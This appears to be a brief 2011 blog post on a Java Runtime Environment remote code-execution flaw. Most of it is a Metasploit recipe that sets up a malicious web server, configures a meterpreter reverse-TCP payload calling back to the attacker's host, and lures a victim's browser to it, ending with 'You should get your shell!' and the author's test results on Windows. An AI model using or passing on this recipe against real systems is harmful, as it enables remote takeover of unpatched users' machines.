Saturday, 30 April 2011
Published: Feb 15 2011 12:00AM
Updated: Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment.An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.This vulnerability affects the following supported versions:6 Update 23 and lower.
To exploit you can use the folloing systax on metasploit:
set SRVHOST 192.168.1.69
set SRVPORT 80
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.69
set LPORT 8888
Then open up the client browser and open the URL http://192.168.1.69/
You should get your shell!
I tested on windows XP and Windows 7, both worked fine, but it didn't worked on ubuntu.